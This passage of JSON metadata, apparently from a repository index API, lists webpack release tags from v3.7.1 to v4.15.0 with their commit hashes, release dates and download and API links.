a0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_pars